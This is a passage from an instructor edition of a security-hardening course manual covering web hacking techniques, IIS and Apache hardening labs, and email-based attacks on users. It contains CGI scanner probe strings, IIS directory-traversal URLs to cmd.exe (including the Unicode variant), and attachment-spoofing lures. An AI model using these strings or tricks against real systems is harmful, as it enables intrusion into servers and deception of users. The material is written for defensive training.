Vulnerability ScanningAlthough it may not be the most glamorous of techniques, searching for existingvulnerabilities is a simple way to recognize holes that will not take much effort tocapitalize on. Even after Web holes and well-known vulnerabilities are exposedfor years, many Web administrators do not patch or fix the holes.

One of the most popular of these is simply cgiscan.c. This program connects to aWeb server (UNIX or NT) and scans to see if the given cgi vulnerabilities arepresent. If they are, the hacker is notified of the condition and can then proceedto exploit the hole.

The following is an excerpt from the code of cgiscan.c to show several of thevulnerabilities this scan searches for:

temp[1] = "GET /cgi-bin/phf HTTP/1.0\n\n";temp[2] = "GET /cgi-bin/Count.cgi HTTP/1.0\n\n";temp[3] = "GET /cgi-bin/test-cgi HTTP/1.0\n\n";temp[4] = "GET /cgi-bin/php.cgi HTTP/1.0\n\n";temp[5] = "GET /cgi-bin/handler HTTP/1.0\n\n";temp[6] = "GET /cgi-bin/webgais HTTP/1.0\n\n";temp[7] = "GET /cgi-bin/websendmail HTTP/1.0\n\n";

Hackers can use this simple and efficient scanner to test sites very quickly. Thiseffective program is one way hackers can identify holes in the security of poten-tial targets.

Common Web HackingTechniques

CGI:(Common Gateway Interface)CGI is the method that Webservers use to allowinteraction between serversand clients.

Lesson 7: Security on the Internet and the WWW 441

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 495: SCNP Hardening

Incorrect Web DesignCommon mistakes that Web designers make are to include extra information or toinclude what are known as hidden tags. These tags define values for a Web pagethat are not visible through the normal Web browser. Only when the source of aWeb page is viewed can these tags be revealed. This extra information could bephone numbers, addresses, site designer logos, even the directory structure of thehard drive where the site resides.

Hackers will simply connect normally to a Web site and view the source code ofthe various pages, searching for keywords and clues to further assist in attackingthe site or network. This process can become tedious, however. If there is a sitewith hundreds of pages, searching their source code, page by page, can take days.

Teleport Pro is a tool that assists in this procedure. With options such as the abil-ity to download an entire Web site to a local hard drive for further examination,Teleport Pro has great features. Teleport Pro can also mirror entire Web sites,including their directory structures. See Figure 7-8 for an example of whatTeleport Pro can do.

Figure 7-8: An example of the options available with Teleport Pro.

Although not as common as in previous years, mainly due to better programming,there are sites and pages where there are hidden tags in the actual Web pages thatdefine the prices of items entered into open text boxes. If this were to be foundas true, the hacker could simply modify the code to represent a value of, say,$5.95 instead of $59.95. During the checkout process on that site, the hacker issimply proceeding as any other user, only with a significant discount on goodspurchased!

442 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 496: SCNP Hardening

Figure 7-9: An example of hidden tags in the source code of a Web page. Notice the pricetags visible to be edited.

Buffer OverflowsBuffer overflows are a staple of hacking techniques that are not lost on Webhacking. Buffer overflows are very effective, and there are two outstanding paperson the subject: “How to Write Buffer Overflows,” by Mudge (1995), and “Smash-ing the stack for fun and profit,” by Aleph One (1996). These two papers outlinethe methods and techniques for creating buffer overflows.

The concept of a buffer overflow is to exploit a program that does not check forthe size of input being stored in a buffer (memory space). By writing input datathat is beyond the normal bounds of the program, an attacker can make modifica-tions to program data stored in an adjacent memory space.

Attackers will target programs that have been programmed in C, as native C pro-gramming does not include a bounds-checking feature. (Bounds checking verifiesthat input fields are restrict to a given value and do not remain open-ended.) Twoexamples of C functions without the checking option are gets and strcpy.

The attack generally has the goal of running an unauthorized process as root. Ifthe attack executes properly, the attacker will have a root shell at his or herdisposal. This is why buffer overflows can be so dangerous. An attacker issues abuffer overflow remotely and ends up with a root shell of a local machine.

Although it may seem that buffer overflows are the key to taking down systems,and you may be wondering why every system on the Internet is not already com-promised, the answer is that the actual writing of buffer overflows is not theeasiest of processes to accomplish.

buffer overflow:This happens when moredata is put into a buffer orholding area than the buffercan handle. This is due to amismatch in processing ratesbetween the producing andconsuming processes. Thiscan result in system crashesor the creation of a backdoor leading to systemaccess.

Hacking Via a BufferOverflow

Lesson 7: Security on the Internet and the WWW 443

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 497: SCNP Hardening

In order for an attacker to start from scratch and attempt a buffer overflow of atarget system, the following steps would have to be completed:

1. Locate the potential target on the Internet. (Not difficult.)

2. Identify the running operating system. (Not difficult.)

3. Identify the running services and programs on the target system. (Starting toget more difficult, since open ports do not indicate all running services andprograms.)

4. Reverse-engineer the services and programs on the target, looking for thepotential buffer overflow holes. (This is where the level of difficulty jumpsmuch higher.)

5. Write the attack code to fall in the correct buffer space on the target. (Stillremaining quite difficult.)

6. Inject attack code on the target system. (Variable difficulty, depending onopen ports, services, and programs running.)

7. Have the code execute and access the root shell. (Not difficult, assuming thatthe exploit is written properly.)

Keeping this in mind, the process of buffer overflows may not seem so overpow-ering as it did a few minutes ago. However, before the assumption is made thatbuffer overflows are not a problem, you must realize that making a buffer over-flow from scratch is not required.

When buffer overflows are discovered, there are exploits written, perhaps by onlyone person, that become available on the Internet. This potential makes bufferoverflows as dangerous as ever, and arguably even more so. Hackers now can usebuffer-overflow attacks with no concept of how they work or what their functionsare. The danger is definitely real.

TASK 7C-1Identifying Web Hacking Techniques

1. Discuss, with at least one other student, the principles of the DDoS,buffer overflows, Web design flaws, and vulnerability scanning.

2. Define potential countermoves that could be used against thesetechniques. Be prepared to discuss your findings with the rest of theclass.

Responses will vary.

Web Server SecuritySecuring a Web server is perhaps the most nerve-racking position that securityprofessionals can find. With changes happening daily, if not hourly, these securityprofessionals may find themselves overwhelmed by the amount of informationthey are to absorb constantly.

444 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 498: SCNP Hardening

IIS SecurityWhen Microsoft released Windows 2000, it came packaged with powerful Webserver software in the form of Internet Information Server (IIS) 5.0. This softwareallows anyone to quickly and easily set up myriad services, including Webservices. Although the number of sites hosted by IIS grows consistently, it is stillfar behind in terms of Web hosting on the Internet.

One of the reasons that IIS is not the leading Web-hosting platform is that therehave been many serious security issues with hosting a Web site on IIS. Over theyears, IIS has been found to have many vulnerabilities; often, these vulnerabilitiesfall under the category of buffer overflows.

One of the methods that attackers will use to gain access to a Web site is oftencalled the double-dot vulnerability. This is an attack that is designed to input acharacter stream that will allow the attacker to gain access to directories outsideof the Web data.

A common attack that is trying to use this vulnerability would look like this:http://10.10.10.1/scripts/../../winnt/system32/cmd.exe. This type of attack, whichmay be successful on older, unpatched Web servers, will not work on a MicrosoftIIS 5.0 Web server. The reason it will not work is that built-in to the IIS softwareis a security-checking feature that looks for the /../ pattern. If this pattern isseen, the server will not grant the request, and the attack fails.

There is, however, a variation of this attack that the security-checking features ofIIS will not catch. This is the Unicode vulnerability. This attack looks like this:http://10.10.10.1/scripts/..%c0%af../winnt/system32/cmd.exe. Although it lookssimilar to the previous attack, this one would be successful on a default IIS 5.0server, because the IIS security-check software runs before the Unicode charactersare decoded. Once successful, this attack will provide the attacker a commandprompt for the server on the remote client.

Another attack that IIS 5.0 servers are vulnerable to is the attack via the InternetPrinting Protocol (IPP). IPP provides users the ability to print documents acrossthe Internet, submitted via a Web browser. Internet Printing is on by default in allIIS 5.0 installations, and all unpatched systems are vulnerable to this exploit.

The specific vulnerability is a buffer overflow in msw3prt.dll. In order for anattacker to take advantage of this, he or she would submit a string of approxi-mately 420 characters that will, in turn, cause the overflow. The overflow in thiscase can be a remote command prompt. For further reading on this vulnerability,please visit the eEye Web site at www.eeye.com, and look under the Advisorieslink.

To secure a machine running IIS 5.0, it is suggested that you follow these recom-mendations:

1. Apply the hisecweb.inf high security template. (Templates were covered ear-lier in the course.)

2. Monitor security updates from Microsoft, using the Microsoft Hotfix utility.Have this tool configured to retrieve updates every day.

3. Follow the steps of the Microsoft “Secure Internet Information Services 5.0Checklist” from TechNet.

4. Harden the IIS machine according to the Microsoft TechNet article “FromBlueprint to Fortress: A Guide to Securing IIS 5.0.”

Securing IIS 5.0

Lesson 7: Security on the Internet and the WWW 445

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 499: SCNP Hardening

TASK 7C-2Investigating IIS Security

Setup: A default install of Windows 2000 Server will have IIS 5.0running. You will use the Security Configuration And AnalysisSnap-in to analyze your machine against the hisecweb.inftemplate.

1. Copy the file hisecweb.inf from the location specified by your instructorto your \WINNT\security\templates folder.

2. Start the MMC, and add the Security Configuration And Analysisstandalone snap-in.

3. In the left pane, right-click Security Configuration And Analysis, andchoose Open Database.

4. Enter newweb, and click Open.

5. From the Import Template dialog box, select hisecweb.inf, and clickOpen.

6. In the left pane, right-click Security Configuration And Analysis, andchoose Analyze Computer Now.

7. Click OK. You should see a list of policies, services, Registry settings, andfile-system information that should be set a certain way if this is to be asecure Web server.

8. Close the window without saving the console.

Web Site ConfigurationThe following task demonstrates how to host a site on your Web server.

TASK 7C-3Implementing a Web Site

1. From the Start menu, choose Programs→Administrative Tools→InternetServices Manager.

2. In the left pane, click and expand the options under your computer. Youshould see items like Default Web Site and Default SMTP Virtual Server.These are the various Internet servers running on your machine.

3. Right-click Default Web Site, and choose Properties. You should see adialog box with a number of tabs relating to this site. Clicking on any tabopens the Property page associated with that tab.

4. If necessary, select the Web Site tab.

Provide students with thelocation of the hisecweb.inf

template file. If you havedownloaded the self-

extracting executable, havestudents extract the .inf file

before proceeding to thenext step.

446 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 500: SCNP Hardening

5. In the IP Address box, observe that All Unassigned is displayed. Thismeans that this Web site will respond to requests from any of the IPaddresses associated with this computer. We need only one address to beactive.

6. For this default Web site, select the IP address connected to your class-room hub from the drop-down list. This is the one listed as 172.16.x.y ifyou are on the left side of the classroom or 172.18.x.y if you are on theright side.

7. Click OK.

8. In Windows Explorer, navigate to the \Inetpub folder. This is the Windowsdefault location for the various Internet-related servers.

9. In the Inetpub folder, create a folder called newweb.

10. Copy the file simple.htm from your course CD to this folder. It should belocated in the \085545\Data\HTML Files folder.

11. Switch back to Internet Services Manager.

12. Right-click your computer name, and choose New→Web Site.

13. In the Web Site Creation Wizard, click Next.

14. For Description, enter newweb, and then click Next.

15. For IP Address To Use For This Web Site, select 172.26.x.y if you are onthe left side of the class or 172.28.x.y if you are on the right side.

16. Click Next.

17. For Path To This Web Site’s Home Directory, click Browse, and thennavigate and point to the newweb folder that you created earlier.

18. Click Next twice, and then click Finish.

19. Right-click the new Web site, and choose Properties.

20. Click the Documents tab.

21. Click Add.

22. For the name of the default document, specify simple.htm, making sure thatyou match the spelling and capitalization.

23. Click OK.

24. Observe the screen. To the left of the box, there are a couple of bentarrows pointing up and down.

25. Click the Up Arrow button as many times as is necessary to pushsimple.htm document to the very top of the list.

26. Click OK. Your new Web site should be set up.

Lesson 7: Security on the Internet and the WWW 447

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 501: SCNP Hardening

27. Right-click the new Web site, and (if necessary) choose Start.

28. Ask your partner to open a browser and connect to your Web site, usinghttp://172.26.x.y or http://172.28.x.y depending on your location in theclassroom.

29. Do the same for your partner. You should be able to view the SCP Chal-lenge Web site hosted on your partner’s machine.

Web Site MaintenanceWhen you are conducting maintenance on a Web, FTP, or email site, you shouldfirst stop the server. When you are done with your work, you should start theserver again, so that all of the changes you have made will take effect properly.

TASK 7C-4Starting and Stopping the Web Server

1. Switch to Internet Services Manager.

2. Right-click your Web site, and choose Stop.

3. Verify that your partner has done the same.

4. Switch to Internet Explorer, and refresh the page by choosing View→Refresh or by pressing F5. You should no longer be able to view the Webpage.

5. Switch to Internet Services Manager.

6. Right-click your Web site, and choose Start.

7. Verify that your partner has done the same.

8. Switch to Internet Explorer, and refresh the page. You should again beable to view the Web page.

9. Switch to Internet Services Manager, and stop your Web server. You willbe doing more configuration of the Web site in the next few tasks.

DoS ProblemsOne of the items that you should think about from a security standpoint is that amalicious user may intend to bring down your Web server by making it so busythat the CPU slows down and eventually hangs. You can control this setting.

448 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 502: SCNP Hardening

TASK 7C-5Controlling Performance Settings

1. Right-click your Web site, and choose Properties.

2. Click the Performance tab.

3. Check Enable Process Throttling, and specify 25 percent. This settingdepends on the number of Web sites hosted on the machine.

4. Check Enforce Limits; otherwise, the only action that the Web server willtake is to write an event to the Event Log when the limit is crossed.

5. Check Enable Bandwidth Throttling, and specify that the maximumbandwidth available to this Web site is 256 KB/s.

6. Leave the Newweb Properties open for the next task.

Web Server Directory SecurityIn a production machine, the home directory should not be located in the samepartition as the operating system, as mentioned earlier. It should be in a separateNTFS partition; it could also be located on another machine on the network.Directory browsing should not be allowed, access to the script source should notbe allowed, and only Read access to the Web site should be allowed. In the nexttask, you will take a look at some of these configuration options.

TASK 7C-6Controlling the Home Directory Settings

Setup: The Newweb Properties are displayed.

1. Click the Home Directory tab.

2. Observe that you can control where the content should come from.Options include a directory on this computer, a share on some other com-puter on this network, or even a redirection to another URL. Leave thisalone for now. Below this are some check boxes relating to Web site access.

3. Verify that Script Source Access, Write, and Directory Browsing areunchecked.

Web Server Access ControlsAccess to your Web site can be controlled by specifying that only certain com-puters or domains should be granted access. You can also do the opposite—explicitly specify denial to a computer or to a group of computers.

Lesson 7: Security on the Internet and the WWW 449

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 503: SCNP Hardening

TASK 7C-7Controlling Access Settings

Setup: The Newweb Properties are displayed.

1. Click the Directory Security tab.

2. Observe that there are three main areas you can work with regardingcontrolling access. They are Anonymous Access And Authentication Con-trol, IP Address And Domain Name Restrictions, and SecureCommunications. For now, you will work with just the middle option.

3. Click the Edit button next to IP Address And Domain NameRestrictions.

4. Observe that, by default, all computers will be granted access. You wantto be more restrictive than the default.

5. Click Add.

6. Observe that you can specify a single machine, a group of machines, ora domain.

7. Leave the radio button selected for Single Computer.

8. Specify the IP address of your partner’s computer. If your IP address is172.26.10.1, specify that you will deny access to 172.26.10.2, and viceversa. Click OK twice.

9. Click OK, and restart your Web server.

10. Ask your partner to visit your Web site. Access to your Web site shouldbe forbidden. Your partner should receive the message You Are Not Autho-rized To View This Page.

11. Stop your Web server again.

12. On the Directory Security tab of the Web server’s Properties, click the Editbutton next to IP Address And Domain Name Restrictions.

13. Select the computer that you have denied access to.

14. Click Remove, then click OK.

15. Click OK, and restart your Web server.

16. Ask your partner to visit your Web site. Your partner should besuccessful.

17. Close all open windows.

450 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 504: SCNP Hardening

Patches and Hot FixesYou have looked at some of the configuration options presented to you by IIS.However, if the underlying software itself is defective and has security holes,then no amount of “correct configuration” will help you. For this, you must be onthe lookout for the latest announcements on attacks on Web servers, vulnerabili-ties discovered, and the ensuing fixes provided by Microsoft. Microsoft isextremely proactive with regard to this and works with many experts in theindustry to provide a fix for a problem before it can get out of hand.

Routinely checking for and applying updates to your Microsoft servers isrecommended. Using the Windows Update command found in the Start menutakes you directly to Microsoft’s Windows Update site, where your machine willbe scanned for what service packs and/or security hot fixes are already installedon your machine. This can also be automated on your machine so that yourmachine periodically checks for updates without intervention by you. In enter-prise scenarios, you might not want your production machines to go out andupdate themselves automatically. Instead, you should perform such updates on atest machine first. When you want to apply a specific patch on your productionmachines, Microsoft will release this as a separate hot fix that you download.

One such update posted on October 30, 2002, Q327696, addresses four newlydiscovered security vulnerabilities affecting Web servers running on Windowscomputers:

• Out-of-process Privilege Escalation

• WebDAV Denial of Service

• Script Source Access Vulnerability

• Cross-site Scripting in IIS Administrative Pages

The first of the four in this list could enable applications on a server to gainsystem-level privileges. It was posted on Microsoft’s Web site with a severityrating of Moderate.

If you were to visit Microsoft’s site, you would also see that these four vulner-abilities had the numbers shown in the following table.

Number VulnerabilityCAN-2002-0869 Out-of-process Privilege EscalationCAN-2002-1182 WebDAV Denial of ServiceCAN-2002-1180 Script Source Access VulnerabilityCAN-2002-1181 Cross-site Scripting in IIS Administrative Pages

These numbers are hyperlinked to the Web site www.cve.mitre.org, where Com-mon Vulnerabilities and Exposures are classified, and the information is shared. Avulnerability that is thoroughly researched and classified is prefixed with the let-ters CVE and followed by the year and incident number. Until then, a temporarynumber is allocated, a candidate number, so the prefix is CAN.

Another good tool to use with IIS is the IIS Lockdown tool, also downloadablefrom Microsoft’s site at www.microsoft.com/downloads/release.asp?ReleaseID=43955. Follow this hyperlink and download the file iislockd.exe.

Lesson 7: Security on the Internet and the WWW 451

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 505: SCNP Hardening

TASK 7C-8Using the IIS Lockdown Tool

1. Copy the file iislockd.exe from the location provided by your instructorto your desktop.

2. Double-click iislockd.exe, and click Next.

3. Click I Agree, and then click Next.

4. Specify that you want to use the Dynamic Web Server (ASP Enabled)template, check View Template Settings, and click Next.

5. Check HTTP and FTP, and verify that SMTP and NNTP are unchecked.If a server has not been installed before, it will be grayed out and will notoffer you any choice.

If you were implementing this tool in a production environment and weresure that you would not use SMTP, then you would check RemoveUnselected Services.

6. Leave the Remove Unselected Services check box unchecked for now,and click Next.

The next page deals with script maps and is important.

7. Observe that, on the Script Maps page, the boxes you check are the onesthat will be disabled.

8. Verify that only the box for ASP is unchecked, and click Next.

On the Additional Security page, again all of the options that you select willbe removed.

9. Leave the Additional Security options checked as they are, and clickNext.

10. Click Next to install the URLScan filter.

11. Verify the summary presented to you, and click Next.

12. Wait until the security settings are applied, then click Next, and clickFinish. It takes only a minute or two to apply the security settings.

Hot-fix CheckerOne good tool to use on a Windows box is the hot-fix checker HfNetChk. Bydownloading the tool from www.microsoft.com and running it, you will veryquickly be able to record what hot fixes and service packs are running on yourmachine, as well as which Knowledge Base articles you have to read to find outmore about a particular fix.

Provide students with thelocation of the IIS

Lockdown tool file.

452 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 506: SCNP Hardening

An excellent article on Microsoft’s Web site regarding how to harden a Windows2000 Server with IIS running on it is Knowledge Base Article Q311135. A sum-mary of the sequence of tasks is presented here. Please visit Microsoft’s Web siteto read the full article.

1. Install Service Pack 3.

2. Run Windows Update.

3. Install and run all IIS updates.

4. Install and run Hfnetchk to compile a list of needed hot fixes.

5. Install Qchain.exe.

6. Use Qchain.exe to install multiple hot fixes with only one restart.

TASK 7C-9Using the Hot Fix Net Check Tool

1. Copy the nsch332.exe file from the location provided by your instructorto your desktop.

2. Double-click nshc332.exe, and click Yes twice to install and to accept theLicense Agreement.

3. Point to a location where you want to install the extracted files, andclick OK. For instance, you could create a folder on your boot partitionnamed hfnetchk, and install the files there.

4. Read the instructions presented to you, and click OK.

5. Open a command prompt, and navigate to the folder where youinstalled nsch332.exe.

6. Enter hfnetchk to check your OS installation. If you are not connected tothe Internet, you may see a couple of error messages while the executableattempts to contact microsoft.com, but you can ignore these for now.

7. View the results.

8. Enter hfnetchk /? to see the Help associated with this executable.

9. Read the description for what HFNETCHK does. If you can lay yourhands on the Microsoft Knowledge Base Articles Q303215 and Q315665,they will provide additional information. Both of these articles are availablefrom Microsoft’s Web site.

10. Examine the various switches available for use with the tool.

11. Enter hfnetchk -v to obtain more detailed output.

12. View the results.

13. Close all open windows.

Provide students with thelocation of the Hot Fix NetCheck tool file.

Lesson 7: Security on the Internet and the WWW 453

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 507: SCNP Hardening

ApacheFor all the press that Microsoft’s IIS has gotten regarding the security vulnerabili-ties, such as those detailed above, you might think that it is the most prolific Webserver, but this is not the case. The Web server that runs the majority of the Websites on the Internet is called Apache. In a recent survey, Apache servers wererunning 63 percent of the Web sites on the Internet. For comparison, IIS is run-ning approximately 23 percent of the sites. Updated statistics can be found atwww.netcraft.com.

Apache is an Open Source application that runs on Linux and UNIX computers.You can obtain the most recent version and release information atwww.apache.org In addition to the Web site, most Linux distributions include theapplication as well. Check the Web site associated with your release for currentApache updates.

Once Apache is running on your server, configuration can begin. The defaultinstallation of the Apache Web server is run under the apache user. This accountis neither required to—nor has access to—write to the server configuration direc-tories, such as etc/httpd/conf.

The configuration files are owned by root, and the apache user is given only Readpermissions to these files. It is suggested that you create a new user account tomanage these files, as root would have no reason to update them. It is also sug-gested that you do not have the apache user account become the managing userfor these files.

One of the files that can be created and used by the Apache server is the.htpasswd file. This file is used to contain users and passwords for authenticationpurposes to the server. The .htpasswd file is encrypted on the hard disk, and bydefault, it is owned by root and the root group.

Another critical file for configuration is the httpd.conf file. Previously, the configoptions were stored in three separate files—access.conf, srm.conf, and httpd.conf.Now, the only file that requires editing of this data is the httpd.conf file. Althoughthere are many different options for managing this file, we will look at some ofthe parameters.

• The ServerType option is used to define whether or not the Apacheserver will run on its own, or as part of the inetd. It is recommended that theserver run on its own, as a standalone server.

• The KeepAlive option is used to define the settings for connection times.This setting is where you can define idle time and how long the server willwait for subsequent client requests.

• The ServerRoot option is used to define the root of the server. It is verystrongly recommended that the server root not be the actual root directoryitself. Commonly, etc/httpd/ will be the root.

These are just a few of the many configuration options that you will have whenyou are configuring a secure Apache Web server. Once you have locked downyour server, you may see why this is the most popular Web server on theInternet.

454 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 508: SCNP Hardening

Topic 7DDescribing Methods Used to Attack UsersIn the past (meaning the late 1980s to early 1990s), most users of the Internetwere technical in nature, and connections to the Internet were not that common.Once the World Wide Web began evolving and large-scale national ISPs beganshowing up, casual users started to log on. By the year 2000, there were manypeople who considered their Internet connections more vital to their lives thanhaving the lights on.

Such an evolution, so fast, has come with downsides. The vast majority of userson the Internet are not even aware of security issues, let alone taking steps toprotect themselves. Many ISPs do not provide adequate security-related informa-tion to their users, and more and more people connect each day.

Email Hack AttacksOf all the potential areas where users of the Internet are at risk, perhaps theiremail systems are the most vulnerable. Even more accurate would be to state thatthe potential risk is what can be done with the email system.

Email hacking generally is done using one of two methods. The first is to actu-ally have the email message itself be the hack by using HTML. The second, andmore common, is to attach malicious files to email messages and send them tounknowing victims.

HTML Email AttacksHTML email attacks are popular, but a bit harder than they seem to be at firstglance. The premise of HTML email hacking is to embed the hacker’s code intothe actual body of the message, so that it is executed by the receiving user’scomputer, but is not visible to that user.

The ability to create an HTML email message in Outlook Express (and Outlook)is built in to the program. To turn on HTML composing:

1. Open Outlook Express.

2. Choose Tools→Options.

3. In the Options dialog box, select the Send tab.

4. On the Send tab, under Mail Sending Format, select HTML.

5. Click OK.

Further options for HTML formatting of Outlook Express email are the choicesof different MIME (Multipurpose Internet Mail Extensions) encoding options, andsending pictures with a message. See Figure 7-10 for an example of thesesettings.

Hack Attacks TargetingUsers

Lesson 7: Security on the Internet and the WWW 455

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 509: SCNP Hardening

Figure 7-10: The encoding options for HTML email in Outlook Express.

Although users and hackers have the option to turn on HTML encoded email,simply having the option to do so does not equate into educated hackers usingHTML properly. It is much easier for most hackers to persuade victims to openattachments, as we will see in a moment.

That being said, let’s take a look at an example of an email message encoded inHTML, shown in Figure 7-11.

Figure 7-11: An example of an HTML email as a text document.

456 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 510: SCNP Hardening

This email is harmless, but it is evident that the amount of what can be encodedin HTML is only limited by the imagination of the composer.

Scripting VulnerabilitiesAlthough the possibilities of HTML encoded email are unlimited, there are spe-cific areas of the target user’s computers that the hacker will want to takeadvantage of. One of these is the ability to execute scripts by the user’s emailclient.

Outlook and Outlook Express have made the lives of hackers much easier byallowing the ability to attack a user simply by having him or her read an email orview it in the Preview pane. This is due to the ActiveX options included in theseMicrosoft programs. We will move off the subject of email hacking for a momentto define ActiveX.

• ActiveX is an implementation of mobile code by Microsoft. The Microsoftdefinition of ActiveX is “A set of technologies that allows software compo-nents to interact with one another in a networked environment, regardless ofthe language the components were created.”

• ActiveX applications (controls) are written to provide a specific purpose,such as showing a movie clip, and are embedded into Web pages to providethis ability. The ActiveX controls, which have an .OCX file extension, areembedded into Web pages by using the <OBJECT> tag. Upon entering aWeb site that has an embedded control, Internet Explorer checks the localuser’s Registry to locate the required component. If the control is not alreadyon the user’s system, Internet Explorer downloads and installs the controlinto the area defined by the Web page’s <OBJECT> tag.

• To stop a hacker from executing any control they wish, Microsoft includedan authentication system called Authenticode. Authenticode requires softwaredevelopers to have their work signed, and a notice of this shows on theuser’s screen in the form of a pop-up window. If the control has not beensigned under the Authenticode system, a warning pops up, informing theuser of this.

• Although the Authenticode system is effective, Microsoft has included anActiveX issue with their Safe For Scripting option. There are two noted con-trols that ship with IE that have this Safe For Scripting option set. Settingthis flag means that the system will go ahead and execute these controlswithout using the Authenticode system. To compound the issue, the twocontrols—named Scriptlet.typelib and EyeDog.Ocx—have the ability toaccess the user’s files. Additionally, Scriptlet.typelib has the ability to edit,create, and even overwrite files on the user’s local hard drive.

• The code example shown in Figure 7-12 was written by Georgi Guninski,who has found many security vulnerabilities and has provided full documen-tation on them. This code would execute upon viewing the associated Webpage. The end result of this code is a simple alert window, but the only limi-tation is the imagination.

Lesson 7: Security on the Internet and the WWW 457

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 511: SCNP Hardening

Figure 7-12: Georgi Guninski’s example of Safe For Scripting vulnerabilities.

The code shown in Figure 7-12 illustrates an example of embedding scripting inWeb pages. Next, we will discuss the option to embed code into email messages.

Just as IE has Safe For Scripting, so do Outlook and Outlook Express. By com-posing an HTML email message that calls the correct control, as in the Webexample above, users can end up executing unknown code.

Email scripting problems for Outlook and Outlook Express can be greatly dimin-ished by disabling the Preview option. In most situations, simply previewing themessage with the code is all that is required for execution.

File AttachmentsNearly all email users have, at some point in time, used the file-attachment fea-ture of email. To send documents to and receive documents from others quicklyis one of the most important features of being connected on the Internet, and oneof the reasons many people connect in the first place.

This natural desire to connect and exchange data (file attachments) is exactlywhat hackers can take advantage of. And, do they ever!

Why bother with complicated scripting or other techniques to get a user to launchthe code of choice the hard way, when it would be much easier to simply sendhim or her the code and have the targeted user install it? This is now the onlymethod used by some hackers.

Administrators battle this problem every minute of every day. Even though users(and administrators are also users) are instructed not to open attachments fromunknown sources, they still will and do. The issue gets even more complex,however.

Just when the word was starting to sink in that no one should ever open anattachment from an unknown source, along came the attack of the worms.

Melissa was the first high-profile example of this new breed of attack. The attackwas simple—repeat this message to everyone in your Address Book. TheILOVEYOU worm continued this method, bringing email systems to a halt again.Networks were flooded with virtually the same email message, only with differentsenders and receivers.

458 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 512: SCNP Hardening

Since everyone is supposed to know not to open unknown attachments, how didILOVEYOU become so effective? The answer is simple—it did not come froman unknown source. It was replicated from someone to their Address Book,meaning that they, at least casually, knew the recipients. The line “kindly checkthe attached LOVELETTER coming from me” was too much temptation forpeople to ignore.

A different type of attachment trick, although still used, is less effective as theuser base becomes more educated about attachments. This technique is to pad thereal name of a file by using spaces. A file may look like it is named tonight.doc,but if one looks carefully, the associated icon is not a document icon, and thereare other visual indicators to the right of the file name, such as the standard threeperiods in parentheses (…). This indicates a longer name than tonight.doc, and isworth exploring further to see the true identify of the file.

In Figure 7-13, you can see that the file name, on first glance, says tonight.doc,but there are signs that the file is not a document. It has the executable icon, andthe (…) would lead to the conclusion there is a long file name issue here. Thisfile will need investigation before execution (if it even will be executed).

Figure 7-13: An example of a hidden extension.

The final approach to email attachments we will discuss here is to use the built-inmessages Outlook has for errors and notifications. The following is one of themore common ones that hackers may employ:

“This message uses a character set that is not supported by the InternetService. To view the original message content, open the attached message. Ifthe text doesn’t display correctly, save the attachment to disk, and then openit using a viewer that can display the original character set.”

This message appears normally in conjunction with errors of the MIME process.It can be just as easily used to convince users to open attachments they may notnormally open. The imagination becomes the only limitation on using this.

Lesson 7: Security on the Internet and the WWW 459

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 513: SCNP Hardening

CookiesNo discussion on the security of users of the Internet would be complete withouta discussion on cookies. Cookies are, for now, a necessary evil. Without cookies,users of their favorite Web sites would have to continuously re-enter information.Cookies are divided into one of two types: persistent and per-session.

• A persistent cookie is one that stores information in a text file on the user’shard drive.

• A per-session cookie is one that stores the needed information only duringthe open session, and when the browser is closed, they are no longer stored.

In the event that a user’s system is compromised, a search for cookies couldreveal much personal information about that user. But, it is possible to gainaccess to a cookie without even attempting to compromise a user’s system.

By using a packet sniffer tool (such as Network Monitor and Ethereal), hackerscan capture the cookie as it travels on the wire. Once the cookie has been cap-tured, it can be replayed against the target server, and the hacker can enter theWeb site using his or her new identity.

Disabling cookies might seem like a good idea, but most people could not use theWeb to do what they want without using cookies. Using the option of PromptBefore Acceptance Of Cookies will annoy most people enough to turn off theoption within the first few minutes of browsing their favorite sites.

DSL and Cable Modem VulnerabilitiesWith the advent of high-speed, always-on Internet connections for the home user,ISPs have created a whole new playing field for hackers. No longer are the longhours of searching for potential targets required. If a hacker is simply looking fora target to practice on, there are now thousands of targets within the hacker’simmediate reach.

These thousands of people were potential targets before, but targeting a user whois only on every now and then, with a slow connection and a different IP addressevery time, is not the most attractive of targets. High-speed Internet access haschanged all that.

No longer is that potential target moving; generally, high-speed Internet connec-tions have static IP addresses or renewed dynamic addresses. No longer is thatpotential target on a slow connection every now and then. Once the hacker hasidentified the target, he or she can be confident that the target will be there in thefuture and ready to respond—only a few ping packets away.

Virtually all home users who now are enjoying their newly found high-speedaccess, and are leaving their computers on 24x7 to take advantage of all they can,are unaware of the increased security risks they now face.

It is hard enough for full-time security administrators to get the users in their net-works to follow solid security practices, so imagine the situation for the homeusers. If they just purchased a shiny new PC with Windows 2000 Professionalloaded, why would they know to modify the Administrator account properties, orto turn on logging?

